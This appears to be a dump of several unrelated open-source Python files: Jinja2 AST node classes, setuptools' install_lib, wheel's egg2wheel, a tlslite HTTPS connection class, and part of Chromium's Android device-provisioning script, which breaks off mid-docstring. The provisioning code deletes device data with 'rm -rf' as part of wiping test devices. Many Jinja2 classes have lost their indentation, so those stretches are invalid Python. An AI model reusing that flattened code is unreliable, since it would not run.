eval_ctx = get_eval_context(self, eval_ctx)
if eval_ctx.volatile:
raise Impossible()
if eval_ctx.autoescape:
return Markup(self.data)
return self.data
class Tuple(Literal):
    """Tuple literal node, used for loop unpacking and for things such as
    multiple subscript arguments.  As with :class:`Name`, `ctx` records
    whether the tuple loads or stores its names.
    """
    fields = ('items', 'ctx')
    def as_const(self, eval_ctx=None):
        """Fold every item to a constant and return them as a tuple."""
        eval_ctx = get_eval_context(self, eval_ctx)
        return tuple(item.as_const(eval_ctx) for item in self.items)
    def can_assign(self):
        """A tuple is assignable only if every element is assignable."""
        return all(item.can_assign() for item in self.items)
class List(Literal):
"""Any list literal such as ``[1, 2, 3]``"""
fields = ('items',)
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return [x.as_const(eval_ctx) for x in self.items]
class Dict(Literal):
"""Any dict literal such as ``{1: 2, 3: 4}``. The items must be a list of
:class:`Pair` nodes.
"""
fields = ('items',)
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return dict(x.as_const(eval_ctx) for x in self.items)
class Pair(Helper):
"""A key, value pair for dicts."""
fields = ('key', 'value')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return self.key.as_const(eval_ctx), self.value.as_const(eval_ctx)
class Keyword(Helper):
"""A key, value pair for keyword arguments where key is a string."""
fields = ('key', 'value')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return self.key, self.value.as_const(eval_ctx)
class CondExpr(Expr):
    """A conditional expression (inline if expression). (``{{
    foo if bar else baz }}``)
    """
    fields = ('test', 'expr1', 'expr2')
    def as_const(self, eval_ctx=None):
        """Fold the conditional; raises :exc:`Impossible` when the false
        branch is taken but no ``else`` expression was given."""
        eval_ctx = get_eval_context(self, eval_ctx)
        if self.test.as_const(eval_ctx):
            return self.expr1.as_const(eval_ctx)
        # if we evaluate to an undefined object, we better do that at runtime
        if self.expr2 is None:
            raise Impossible()
        return self.expr2.as_const(eval_ctx)
class Filter(Expr):
    """This node applies a filter on an expression. `name` is the name of
    the filter, the rest of the fields are the same as for :class:`Call`.
    If the `node` of a filter is `None` the contents of the last buffer are
    filtered. Buffers are created by macros and filter blocks.
    """
    fields = ('node', 'name', 'args', 'kwargs', 'dyn_args', 'dyn_kwargs')
    def as_const(self, eval_ctx=None):
        """Apply the filter at compile time, or raise :exc:`Impossible`.

        Folding is refused for volatile contexts, buffer filters
        (``node is None``), unknown filters, and context filters — all of
        those need runtime state.
        """
        eval_ctx = get_eval_context(self, eval_ctx)
        if eval_ctx.volatile or self.node is None:
            raise Impossible()
        # we have to be careful here because we call filter_ below.
        # if this variable would be called filter, 2to3 would wrap the
        # call in a list beause it is assuming we are talking about the
        # builtin filter function here which no longer returns a list in
        # python 3. because of that, do not rename filter_ to filter!
        filter_ = self.environment.filters.get(self.name)
        if filter_ is None or getattr(filter_, 'contextfilter', False):
            raise Impossible()
        obj = self.node.as_const(eval_ctx)
        args = [x.as_const(eval_ctx) for x in self.args]
        # eval-context and environment filters receive their extra first
        # argument here, mirroring the runtime calling convention
        if getattr(filter_, 'evalcontextfilter', False):
            args.insert(0, eval_ctx)
        elif getattr(filter_, 'environmentfilter', False):
            args.insert(0, self.environment)
        kwargs = dict(x.as_const(eval_ctx) for x in self.kwargs)
        if self.dyn_args is not None:
            try:
                args.extend(self.dyn_args.as_const(eval_ctx))
            except Exception:
                raise Impossible()
        if self.dyn_kwargs is not None:
            try:
                kwargs.update(self.dyn_kwargs.as_const(eval_ctx))
            except Exception:
                raise Impossible()
        try:
            return filter_(obj, *args, **kwargs)
        except Exception:
            raise Impossible()
class Test(Expr):
"""Applies a test on an expression. `name` is the name of the test, the
rest of the fields are the same as for :class:`Call`.
"""
fields = ('node', 'name', 'args', 'kwargs', 'dyn_args', 'dyn_kwargs')
class Call(Expr):
    """Calls an expression. `args` is a list of arguments, `kwargs` a list
    of keyword arguments (list of :class:`Keyword` nodes), and `dyn_args`
    and `dyn_kwargs` has to be either `None` or a node that is used as
    node for dynamic positional (``*args``) or keyword (``**kwargs``)
    arguments.
    """
    fields = ('node', 'args', 'kwargs', 'dyn_args', 'dyn_kwargs')
    def as_const(self, eval_ctx=None):
        """Perform the call at compile time, or raise :exc:`Impossible`.

        Context functions can never be folded; eval-context and
        environment functions get their implicit first argument injected
        before the call, mirroring the runtime calling convention.
        """
        eval_ctx = get_eval_context(self, eval_ctx)
        if eval_ctx.volatile:
            raise Impossible()
        obj = self.node.as_const(eval_ctx)
        # don't evaluate context functions
        args = [x.as_const(eval_ctx) for x in self.args]
        if isinstance(obj, _context_function_types):
            if getattr(obj, 'contextfunction', False):
                raise Impossible()
            elif getattr(obj, 'evalcontextfunction', False):
                args.insert(0, eval_ctx)
            elif getattr(obj, 'environmentfunction', False):
                args.insert(0, self.environment)
        kwargs = dict(x.as_const(eval_ctx) for x in self.kwargs)
        if self.dyn_args is not None:
            try:
                args.extend(self.dyn_args.as_const(eval_ctx))
            except Exception:
                raise Impossible()
        if self.dyn_kwargs is not None:
            try:
                kwargs.update(self.dyn_kwargs.as_const(eval_ctx))
            except Exception:
                raise Impossible()
        try:
            return obj(*args, **kwargs)
        except Exception:
            raise Impossible()
class Getitem(Expr):
"""Get an attribute or item from an expression and prefer the item."""
fields = ('node', 'arg', 'ctx')
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
if self.ctx != 'load':
raise Impossible()
try:
return self.environment.getitem(self.node.as_const(eval_ctx),
self.arg.as_const(eval_ctx))
except Exception:
raise Impossible()
def can_assign(self):
return False
class Getattr(Expr):
    """Get an attribute or item from an expression that is a ascii-only
    bytestring and prefer the attribute.
    """
    fields = ('node', 'attr', 'ctx')
    def as_const(self, eval_ctx=None):
        """Constant-fold the attribute lookup or raise :exc:`Impossible`.

        The eval context is resolved *before* the ``try`` block, matching
        :class:`Getitem`: failing to obtain a context is a programming
        error and should propagate rather than be masked as Impossible.
        """
        if self.ctx != 'load':
            raise Impossible()
        eval_ctx = get_eval_context(self, eval_ctx)
        try:
            return self.environment.getattr(self.node.as_const(eval_ctx),
                                            self.attr)
        except Exception:
            raise Impossible()
    def can_assign(self):
        """Attribute targets are never assignable in templates."""
        return False
class Slice(Expr):
    """Represents a slice object. This must only be used as argument for
    :class:`Subscript`.
    """
    fields = ('start', 'stop', 'step')
    def as_const(self, eval_ctx=None):
        """Fold the three bounds (each of which may be ``None``) into a
        plain :class:`slice` object."""
        eval_ctx = get_eval_context(self, eval_ctx)
        bounds = [
            None if part is None else part.as_const(eval_ctx)
            for part in (self.start, self.stop, self.step)
        ]
        return slice(*bounds)
class Concat(Expr):
"""Concatenates the list of expressions provided after converting them to
unicode.
"""
fields = ('nodes',)
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return ''.join(text_type(x.as_const(eval_ctx)) for x in self.nodes)
class Compare(Expr):
    """Compares an expression with some other expressions. `ops` must be a
    list of :class:`Operand`\s.
    """
    fields = ('expr', 'ops')
    def as_const(self, eval_ctx=None):
        """Constant-fold a (possibly chained) comparison.

        Mirrors Python's chained-comparison semantics: ``a < b < c`` means
        ``(a < b) and (b < c)`` with short-circuiting.  The previous
        implementation kept only the *last* pairwise result, so a chain
        such as ``3 < 2 > 1`` incorrectly folded to True; we now bail out
        as soon as any comparison in the chain is falsy.
        """
        eval_ctx = get_eval_context(self, eval_ctx)
        result = value = self.expr.as_const(eval_ctx)
        try:
            for op in self.ops:
                new_value = op.expr.as_const(eval_ctx)
                result = _cmpop_to_func[op.op](value, new_value)
                if not result:
                    # Short-circuit: the whole chain is already false.
                    return result
                value = new_value
        except Exception:
            raise Impossible()
        return result
class Operand(Helper):
"""Holds an operator and an expression."""
fields = ('op', 'expr')
if __debug__:
Operand.__doc__ += '\nThe following operators are available: ' + \
', '.join(sorted('``%s``' % x for x in set(_binop_to_func) |
set(_uaop_to_func) | set(_cmpop_to_func)))
class Mul(BinExpr):
"""Multiplies the left with the right node."""
operator = '*'
class Div(BinExpr):
"""Divides the left by the right node."""
operator = '/'
class FloorDiv(BinExpr):
    """Divides the left by the right node, flooring the result to an
    integer (the ``//`` operator).
    """
    operator = '//'
class Add(BinExpr):
"""Add the left to the right node."""
operator = '+'
class Sub(BinExpr):
"""Substract the right from the left node."""
operator = '-'
class Mod(BinExpr):
"""Left modulo right."""
operator = '%'
class Pow(BinExpr):
"""Left to the power of right."""
operator = '**'
class And(BinExpr):
"""Short circuited AND."""
operator = 'and'
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return self.left.as_const(eval_ctx) and self.right.as_const(eval_ctx)
class Or(BinExpr):
"""Short circuited OR."""
operator = 'or'
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return self.left.as_const(eval_ctx) or self.right.as_const(eval_ctx)
class Not(UnaryExpr):
"""Negate the expression."""
operator = 'not'
class Neg(UnaryExpr):
"""Make the expression negative."""
operator = '-'
class Pos(UnaryExpr):
"""Make the expression positive (noop for most expressions)"""
operator = '+'
# Helpers for extensions
class EnvironmentAttribute(Expr):
"""Loads an attribute from the environment object. This is useful for
extensions that want to call a callback stored on the environment.
"""
fields = ('name',)
class ExtensionAttribute(Expr):
"""Returns the attribute of an extension bound to the environment.
The identifier is the identifier of the :class:`Extension`.
This node is usually constructed by calling the
:meth:`~jinja2.ext.Extension.attr` method on an extension.
"""
fields = ('identifier', 'name')
class ImportedName(Expr):
"""If created with an import name the import name is returned on node
access. For example ``ImportedName('cgi.escape')`` returns the `escape`
function from the cgi module on evaluation. Imports are optimized by the
compiler so there is no need to assign them to local variables.
"""
fields = ('importname',)
class InternalName(Expr):
"""An internal name in the compiler. You cannot create these nodes
yourself but the parser provides a
:meth:`~jinja2.parser.Parser.free_identifier` method that creates
a new identifier for you. This identifier is not available from the
template and is not threated specially by the compiler.
"""
fields = ('name',)
def __init__(self):
raise TypeError('Can\'t create internal names. Use the '
'`free_identifier` method on a parser.')
class MarkSafe(Expr):
"""Mark the wrapped expression as safe (wrap it as `Markup`)."""
fields = ('expr',)
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
return Markup(self.expr.as_const(eval_ctx))
class MarkSafeIfAutoescape(Expr):
"""Mark the wrapped expression as safe (wrap it as `Markup`) but
only if autoescaping is active.
.. versionadded:: 2.5
"""
fields = ('expr',)
def as_const(self, eval_ctx=None):
eval_ctx = get_eval_context(self, eval_ctx)
if eval_ctx.volatile:
raise Impossible()
expr = self.expr.as_const(eval_ctx)
if eval_ctx.autoescape:
return Markup(expr)
return expr
class ContextReference(Expr):
"""Returns the current template context. It can be used like a
:class:`Name` node, with a ``'load'`` ctx and will return the
current :class:`~jinja2.runtime.Context` object.
Here an example that assigns the current template name to a
variable named `foo`::
Assign(Name('foo', ctx='store'),
Getattr(ContextReference(), 'name'))
"""
class Continue(Stmt):
"""Continue a loop."""
class Break(Stmt):
"""Break a loop."""
class Scope(Stmt):
"""An artificial scope."""
fields = ('body',)
class EvalContextModifier(Stmt):
"""Modifies the eval context. For each option that should be modified,
a :class:`Keyword` has to be added to the :attr:`options` list.
Example to change the `autoescape` setting::
EvalContextModifier(options=[Keyword('autoescape', Const(True))])
"""
fields = ('options',)
class ScopedEvalContextModifier(EvalContextModifier):
"""Modifies the eval context and reverts it later. Works exactly like
:class:`EvalContextModifier` but will only modify the
:class:`~jinja2.nodes.EvalContext` for nodes in the :attr:`body`.
"""
fields = ('body',)
# make sure nobody creates custom nodes
def _failing_new(*args, **kwargs):
    """Replacement ``__new__`` that rejects user-defined node types."""
    raise TypeError('can\'t create custom node types')
NodeType.__new__ = staticmethod(_failing_new)
del _failing_new
| apache-2.0 |
Widiot/simpleblog | venv/lib/python3.5/site-packages/setuptools/command/install_lib.py | 431 | 3840 | import os
import imp
from itertools import product, starmap
import distutils.command.install_lib as orig
class install_lib(orig.install_lib):
    """Don't add compiled flags to filenames of non-Python files"""
    def run(self):
        # Build, then install; byte-compile afterwards so extension stubs
        # produced during install get compiled as well.
        self.build()
        outfiles = self.install()
        if outfiles is not None:
            # always compile, in case we have any extension stubs to deal with
            self.byte_compile(outfiles)
    def get_exclusions(self):
        """
        Return a collections.Sized collections.Container of paths to be
        excluded for single_version_externally_managed installations.
        """
        # Every (package, exclusion-path) combination across all namespace
        # packages and their parents becomes one excluded full path.
        all_packages = (
            pkg
            for ns_pkg in self._get_SVEM_NSPs()
            for pkg in self._all_packages(ns_pkg)
        )
        excl_specs = product(all_packages, self._gen_exclusion_paths())
        return set(starmap(self._exclude_pkg_path, excl_specs))
    def _exclude_pkg_path(self, pkg, exclusion_path):
        """
        Given a package name and exclusion path within that package,
        compute the full exclusion path.
        """
        parts = pkg.split('.') + [exclusion_path]
        return os.path.join(self.install_dir, *parts)
    @staticmethod
    def _all_packages(pkg_name):
        """
        Yield the dotted package name and each of its parent packages.

        >>> list(install_lib._all_packages('foo.bar.baz'))
        ['foo.bar.baz', 'foo.bar', 'foo']
        """
        while pkg_name:
            yield pkg_name
            pkg_name, sep, child = pkg_name.rpartition('.')
    def _get_SVEM_NSPs(self):
        """
        Get namespace packages (list) but only for
        single_version_externally_managed installations and empty otherwise.
        """
        # TODO: is it necessary to short-circuit here? i.e. what's the cost
        # if get_finalized_command is called even when namespace_packages is
        # False?
        if not self.distribution.namespace_packages:
            return []
        install_cmd = self.get_finalized_command('install')
        svem = install_cmd.single_version_externally_managed
        return self.distribution.namespace_packages if svem else []
    @staticmethod
    def _gen_exclusion_paths():
        """
        Generate file paths to be excluded for namespace packages (bytecode
        cache files).
        """
        # always exclude the package module itself
        yield '__init__.py'
        yield '__init__.pyc'
        yield '__init__.pyo'
        # Python 3 stores bytecode under __pycache__ with an interpreter
        # tag; interpreters without imp.get_tag use the legacy names only.
        if not hasattr(imp, 'get_tag'):
            return
        base = os.path.join('__pycache__', '__init__.' + imp.get_tag())
        yield base + '.pyc'
        yield base + '.pyo'
        yield base + '.opt-1.pyc'
        yield base + '.opt-2.pyc'
    def copy_tree(
            self, infile, outfile,
            preserve_mode=1, preserve_times=1, preserve_symlinks=0, level=1
    ):
        # Symlink preservation is unsupported here; modes/times must be kept.
        assert preserve_mode and preserve_times and not preserve_symlinks
        exclude = self.get_exclusions()
        if not exclude:
            return orig.install_lib.copy_tree(self, infile, outfile)
        # Exclude namespace package __init__.py* files from the output
        from setuptools.archive_util import unpack_directory
        from distutils import log
        outfiles = []
        def pf(src, dst):
            # Copy filter: a falsy return skips the file entirely.
            if dst in exclude:
                log.warn("Skipping installation of %s (namespace package)",
                         dst)
                return False
            log.info("copying %s -> %s", src, os.path.dirname(dst))
            outfiles.append(dst)
            return dst
        unpack_directory(infile, outfile, pf)
        return outfiles
    def get_outputs(self):
        # Filter excluded (namespace-package) files out of the reported
        # install outputs.
        outputs = orig.install_lib.get_outputs(self)
        exclude = self.get_exclusions()
        if exclude:
            return [f for f in outputs if f not in exclude]
        return outputs
| mit |
hungtt57/matchmaker | lib/python2.7/site-packages/wheel/egg2wheel.py | 471 | 2633 | #!/usr/bin/env python
import os.path
import re
import sys
import tempfile
import zipfile
import wheel.bdist_wheel
import shutil
import distutils.dist
from distutils.archive_util import make_archive
from argparse import ArgumentParser
from glob import iglob
egg_info_re = re.compile(r'''(?P<name>.+?)-(?P<ver>.+?)
(-(?P<pyver>.+?))?(-(?P<arch>.+?))?.egg''', re.VERBOSE)
def egg2wheel(egg_path, dest_dir):
    """Convert a single egg (zip file or installed directory) into a wheel
    written to `dest_dir`.

    Name, version, pyver and arch are parsed out of the egg's filename via
    ``egg_info_re``.  NOTE(review): the regex makes the pyver segment
    optional, so ``egg_info['pyver']`` can be ``None`` and the ``.replace``
    below would raise — confirm all inputs carry a pyver segment.
    """
    egg_info = egg_info_re.match(os.path.basename(egg_path)).groupdict()
    dir = tempfile.mkdtemp(suffix="_e2w")
    if os.path.isfile(egg_path):
        # assume we have a bdist_egg otherwise
        egg = zipfile.ZipFile(egg_path)
        egg.extractall(dir)
    else:
        # support buildout-style installed eggs directories
        for pth in os.listdir(egg_path):
            src = os.path.join(egg_path, pth)
            if os.path.isfile(src):
                shutil.copy2(src, dir)
            else:
                shutil.copytree(src, os.path.join(dir, pth))
    dist_info = "%s-%s" % (egg_info['name'], egg_info['ver'])
    abi = 'none'
    pyver = egg_info['pyver'].replace('.', '')
    arch = (egg_info['arch'] or 'any').replace('.', '_').replace('-', '_')
    if arch != 'any':
        # assume all binary eggs are for CPython
        pyver = 'cp' + pyver[2:]
    wheel_name = '-'.join((
        dist_info,
        pyver,
        abi,
        arch
    ))
    bw = wheel.bdist_wheel.bdist_wheel(distutils.dist.Distribution())
    # a pure-Python egg (no arch segment) installs into purelib
    bw.root_is_purelib = egg_info['arch'] is None
    dist_info_dir = os.path.join(dir, '%s.dist-info' % dist_info)
    bw.egg2dist(os.path.join(dir, 'EGG-INFO'),
                dist_info_dir)
    bw.write_wheelfile(dist_info_dir, generator='egg2wheel')
    bw.write_record(dir, dist_info_dir)
    # make_archive produces a .zip; rename it to the .whl extension
    filename = make_archive(os.path.join(dest_dir, wheel_name), 'zip', root_dir=dir)
    os.rename(filename, filename[:-3] + 'whl')
    shutil.rmtree(dir)
def main():
    """Command-line entry point: convert every egg matching the given
    glob patterns into a wheel in --dest-dir."""
    parser = ArgumentParser()
    parser.add_argument('eggs', nargs='*', help="Eggs to convert")
    parser.add_argument('--dest-dir', '-d', default=os.path.curdir,
                        help="Directory to store wheels (default %(default)s)")
    parser.add_argument('--verbose', '-v', action='store_true')
    args = parser.parse_args()
    verbose = args.verbose
    for pattern in args.eggs:
        for egg_path in iglob(pattern):
            if verbose:
                sys.stdout.write("{0}... ".format(egg_path))
            egg2wheel(egg_path, args.dest_dir)
            if verbose:
                sys.stdout.write("OK\n")
if __name__ == "__main__":
main()
| mit |
glwu/python-for-android | python-build/python-libs/gdata/build/lib/gdata/tlslite/integration/HTTPTLSConnection.py | 271 | 6668 | """TLS Lite + httplib."""
import socket
import httplib
from gdata.tlslite.TLSConnection import TLSConnection
from gdata.tlslite.integration.ClientHelper import ClientHelper
class HTTPBaseTLSConnection(httplib.HTTPConnection):
    """This abstract class provides a framework for adding TLS support
    to httplib."""
    # Standard HTTPS port.
    default_port = 443
    def __init__(self, host, port=None, strict=None):
        if strict == None:
            #Python 2.2 doesn't support strict
            httplib.HTTPConnection.__init__(self, host, port)
        else:
            httplib.HTTPConnection.__init__(self, host, port, strict)
    def connect(self):
        """Open a TCP connection to (host, port), wrap it in a TLS
        connection and run the subclass-provided handshake."""
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        if hasattr(sock, 'settimeout'):
            # 10-second timeout, where the platform supports it
            sock.settimeout(10)
        sock.connect((self.host, self.port))
        #Use a TLSConnection to emulate a socket
        self.sock = TLSConnection(sock)
        #When httplib closes this, close the socket
        self.sock.closeSocket = True
        self._handshake(self.sock)
    def _handshake(self, tlsConnection):
        """Called to perform some sort of handshake.
        This method must be overridden in a subclass to do some type of
        handshake. This method will be called after the socket has
        been connected but before any data has been sent. If this
        method does not raise an exception, the TLS connection will be
        considered valid.
        This method may (or may not) be called every time an HTTP
        request is performed, depending on whether the underlying HTTP
        connection is persistent.
        @type tlsConnection: L{tlslite.TLSConnection.TLSConnection}
        @param tlsConnection: The connection to perform the handshake
        on.
        """
        raise NotImplementedError()
class HTTPTLSConnection(HTTPBaseTLSConnection, ClientHelper):
"""This class extends L{HTTPBaseTLSConnection} to support the
common types of handshaking."""
def __init__(self, host, port=None,
username=None, password=None, sharedKey=None,
certChain=None, privateKey=None,
cryptoID=None, protocol=None,
x509Fingerprint=None,
x509TrustList=None, x509CommonName=None,
settings = None):
"""Create a new HTTPTLSConnection.
For client authentication, use one of these argument
combinations:
- username, password (SRP)
- username, sharedKey (shared-key)
- certChain, privateKey (certificate)
For server authentication, you can either rely on the
implicit mutual authentication performed by SRP or
shared-keys, or you can do certificate-based server
authentication with one of these argument combinations:
- cryptoID[, protocol] (requires cryptoIDlib)
- x509Fingerprint
- x509TrustList[, x509CommonName] (requires cryptlib_py)
Certificate-based server authentication is compatible with
SRP or certificate-based client authentication. It is
not compatible with shared-keys.
The constructor does not perform the TLS handshake itself, but
simply stores these arguments for later. The handshake is
performed only when this class needs to connect with the
server. Thus you should be prepared to handle TLS-specific
exceptions when calling methods inherited from
L{httplib.HTTPConnection} such as request(), connect(), and
send(). See the client handshake functions in
L{tlslite.TLSConnection.TLSConnection} for details on which
exceptions might be raised.
@type host: str
@param host: Server to connect to.
@type port: int
@param port: Port to connect to.
@type username: str
@param username: SRP or shared-key username. Requires the
'password' or 'sharedKey' argument.
@type password: str
@param password: SRP password for mutual authentication.
Requires the 'username' argument.
@type sharedKey: str
@param sharedKey: Shared key for mutual authentication.
Requires the 'username' argument.
@type certChain: L{tlslite.X509CertChain.X509CertChain} or
L{cryptoIDlib.CertChain.CertChain}
@param certChain: Certificate chain for client authentication.
Requires the 'privateKey' argument. Excludes the SRP or
shared-key related arguments.
@type privateKey: L{tlslite.utils.RSAKey.RSAKey}
@param privateKey: Private key for client authentication.
Requires the 'certChain' argument. Excludes the SRP or
shared-key related arguments.
@type cryptoID: str
@param cryptoID: cryptoID for server authentication. Mutually
exclusive with the 'x509...' arguments.
@type protocol: str
@param protocol: cryptoID protocol URI for server
authentication. Requires the 'cryptoID' argument.
@type x509Fingerprint: str
@param x509Fingerprint: Hex-encoded X.509 fingerprint for
server authentication. Mutually exclusive with the 'cryptoID'
and 'x509TrustList' arguments.
@type x509TrustList: list of L{tlslite.X509.X509}
@param x509TrustList: A list of trusted root certificates. The
other party must present a certificate chain which extends to
one of these root certificates. The cryptlib_py module must be
installed to use this parameter. Mutually exclusive with the
'cryptoID' and 'x509Fingerprint' arguments.
@type x509CommonName: str
@param x509CommonName: The end-entity certificate's 'CN' field
must match this value. For a web server, this is typically a
server name such as 'www.amazon.com'. Mutually exclusive with
the 'cryptoID' and 'x509Fingerprint' arguments. Requires the
'x509TrustList' argument.
@type settings: L{tlslite.HandshakeSettings.HandshakeSettings}
@param settings: Various settings which can be used to control
the ciphersuites, certificate types, and SSL/TLS versions
offered by the client.
"""
HTTPBaseTLSConnection.__init__(self, host, port)
ClientHelper.__init__(self,
username, password, sharedKey,
certChain, privateKey,
cryptoID, protocol,
x509Fingerprint,
x509TrustList, x509CommonName,
settings)
def _handshake(self, tlsConnection):
ClientHelper._handshake(self, tlsConnection)
| apache-2.0 |
danakj/chromium | build/android/provision_devices.py | 5 | 22286 | #!/usr/bin/env python
#
# Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Provisions Android devices with settings required for bots.
Usage:
./provision_devices.py [-d <device serial number>]
"""
import argparse
import datetime
import json
import logging
import os
import posixpath
import re
import subprocess
import sys
import time
# Import _strptime before threaded code. datetime.datetime.strptime is
# threadsafe except for the initial import of the _strptime module.
# See crbug.com/584730 and https://bugs.python.org/issue7980.
import _strptime # pylint: disable=unused-import
import devil_chromium
from devil.android import battery_utils
from devil.android import device_blacklist
from devil.android import device_errors
from devil.android import device_temp_file
from devil.android import device_utils
from devil.android.sdk import keyevent
from devil.android.sdk import version_codes
from devil.constants import exit_codes
from devil.utils import run_tests_helper
from devil.utils import timeout_retry
from pylib import constants
from pylib import device_settings
from pylib.constants import host_paths
_SYSTEM_WEBVIEW_PATHS = ['/system/app/webview', '/system/app/WebViewGoogle']
_CHROME_PACKAGE_REGEX = re.compile('.*chrom.*')
_TOMBSTONE_REGEX = re.compile('tombstone.*')
class _DEFAULT_TIMEOUTS(object):
# L can take a while to reboot after a wipe.
LOLLIPOP = 600
PRE_LOLLIPOP = 180
HELP_TEXT = '{}s on L, {}s on pre-L'.format(LOLLIPOP, PRE_LOLLIPOP)
class _PHASES(object):
WIPE = 'wipe'
PROPERTIES = 'properties'
FINISH = 'finish'
ALL = [WIPE, PROPERTIES, FINISH]
def ProvisionDevices(args):
  """Provision all attached (or the requested) devices in parallel.

  Returns 0 on success.  Raises DeviceUnreachableError if the requested
  device is absent, and NoDevicesError if every device ended up on the
  blacklist.
  """
  blacklist = (device_blacklist.Blacklist(args.blacklist_file)
               if args.blacklist_file
               else None)
  devices = [d for d in device_utils.DeviceUtils.HealthyDevices(blacklist)
             if not args.emulators or d.adb.is_emulator]
  if args.device:
    devices = [d for d in devices if d == args.device]
    if not devices:
      raise device_errors.DeviceUnreachableError(args.device)
  parallel_devices = device_utils.DeviceUtils.parallel(devices)
  if args.emulators:
    # Emulators only get their properties set; no wipe/reboot cycle.
    parallel_devices.pMap(SetProperties, args)
  else:
    parallel_devices.pMap(ProvisionDevice, blacklist, args)
  if args.auto_reconnect:
    _LaunchHostHeartbeat()
  blacklisted_devices = blacklist.Read() if blacklist else []
  if args.output_device_blacklist:
    with open(args.output_device_blacklist, 'w') as f:
      json.dump(blacklisted_devices, f)
  if all(d in blacklisted_devices for d in devices):
    raise device_errors.NoDevicesError
  return 0
def ProvisionDevice(device, blacklist, options):
  """Run the configured provisioning phases (wipe/properties/finish) on a
  single device, blacklisting it on timeout or failure instead of raising."""
  def should_run_phase(phase_name):
    # An empty --phase list means "run every phase".
    return not options.phases or phase_name in options.phases
  def run_phase(phase_func, reboot_timeout, reboot=True):
    # Wait for boot (rebooting once if it stalls), run the phase, then
    # optionally reboot to apply its effects.
    try:
      device.WaitUntilFullyBooted(timeout=reboot_timeout, retries=0)
    except device_errors.CommandTimeoutError:
      logging.error('Device did not finish booting. Will try to reboot.')
      device.Reboot(timeout=reboot_timeout)
    phase_func(device, options)
    if reboot:
      device.Reboot(False, retries=0)
      device.adb.WaitForDevice()
  try:
    if options.reboot_timeout:
      reboot_timeout = options.reboot_timeout
    elif device.build_version_sdk >= version_codes.LOLLIPOP:
      reboot_timeout = _DEFAULT_TIMEOUTS.LOLLIPOP
    else:
      reboot_timeout = _DEFAULT_TIMEOUTS.PRE_LOLLIPOP
    if should_run_phase(_PHASES.WIPE):
      # User builds and M+ devices cannot take the full wipe path.
      if (options.chrome_specific_wipe or device.IsUserBuild() or
          device.build_version_sdk >= version_codes.MARSHMALLOW):
        run_phase(WipeChromeData, reboot_timeout)
      else:
        run_phase(WipeDevice, reboot_timeout)
    if should_run_phase(_PHASES.PROPERTIES):
      run_phase(SetProperties, reboot_timeout)
    if should_run_phase(_PHASES.FINISH):
      # Final phase: leave the device booted (no trailing reboot).
      run_phase(FinishProvisioning, reboot_timeout, reboot=False)
    if options.chrome_specific_wipe:
      package = "com.google.android.gms"
      version_name = device.GetApplicationVersion(package)
      logging.info("Version name for %s is %s", package, version_name)
    CheckExternalStorage(device)
  except device_errors.CommandTimeoutError:
    logging.exception('Timed out waiting for device %s. Adding to blacklist.',
                      str(device))
    if blacklist:
      blacklist.Extend([str(device)], reason='provision_timeout')
  except device_errors.CommandFailedError:
    logging.exception('Failed to provision device %s. Adding to blacklist.',
                      str(device))
    if blacklist:
      blacklist.Extend([str(device)], reason='provision_failure')
def CheckExternalStorage(device):
  """Checks that storage is writable and if not makes it writable.
  Arguments:
    device: The device to check.
  """
  try:
    # Probe writability by creating a temp file on external storage.
    with device_temp_file.DeviceTempFile(
        device.adb, suffix='.sh', dir=device.GetExternalStoragePath()) as f:
      device.WriteFile(f.name, 'test')
  except device_errors.CommandFailedError:
    logging.info('External storage not writable. Remounting / as RW')
    device.RunShellCommand(['mount', '-o', 'remount,rw', '/'],
                           check_return=True, as_root=True)
    device.EnableRoot()
    # Retry the probe after remounting; a failure here propagates.
    with device_temp_file.DeviceTempFile(
        device.adb, suffix='.sh', dir=device.GetExternalStoragePath()) as f:
      device.WriteFile(f.name, 'test')
def WipeChromeData(device, options):
  """Wipes chrome specific data from device
  (1) uninstall any app whose name matches *chrom*, except
      com.android.chrome, which is the chrome stable package. Doing so also
      removes the corresponding dirs under /data/data/ and /data/app/
  (2) remove any dir under /data/app-lib/ whose name matches *chrom*
  (3) remove any files under /data/tombstones/ whose name matches "tombstone*"
  (4) remove /data/local.prop if there is any
  (5) remove /data/local/chrome-command-line if there is any
  (6) remove anything under /data/local/.config/ if the dir exists
      (this is telemetry related)
  (7) remove anything under /data/local/tmp/
  Arguments:
    device: the device to wipe
  """
  if options.skip_wipe:
    return
  try:
    if device.IsUserBuild():
      # User builds have no root: only uninstall and clear world-writable
      # locations.
      _UninstallIfMatch(device, _CHROME_PACKAGE_REGEX,
                        constants.PACKAGE_INFO['chrome_stable'].package)
      device.RunShellCommand('rm -rf %s/*' % device.GetExternalStoragePath(),
                             check_return=True)
      device.RunShellCommand('rm -rf /data/local/tmp/*', check_return=True)
    else:
      device.EnableRoot()
      _UninstallIfMatch(device, _CHROME_PACKAGE_REGEX,
                        constants.PACKAGE_INFO['chrome_stable'].package)
      _WipeUnderDirIfMatch(device, '/data/app-lib/', _CHROME_PACKAGE_REGEX)
      _WipeUnderDirIfMatch(device, '/data/tombstones/', _TOMBSTONE_REGEX)
      _WipeFileOrDir(device, '/data/local.prop')
      _WipeFileOrDir(device, '/data/local/chrome-command-line')
      _WipeFileOrDir(device, '/data/local/.config/')
      _WipeFileOrDir(device, '/data/local/tmp/')
      device.RunShellCommand('rm -rf %s/*' % device.GetExternalStoragePath(),
                             check_return=True)
  except device_errors.CommandFailedError:
    # Best-effort wipe: log and continue rather than failing provisioning.
    logging.exception('Possible failure while wiping the device. '
                      'Attempting to continue.')
def WipeDevice(device, options):
  """Wipes data from device, keeping only the adb_keys for authorization.

  After wiping data on a device that has been authorized, adb can still
  communicate with the device, but after reboot the device will need to be
  re-authorized because the adb keys file is stored in /data/misc/adb/.
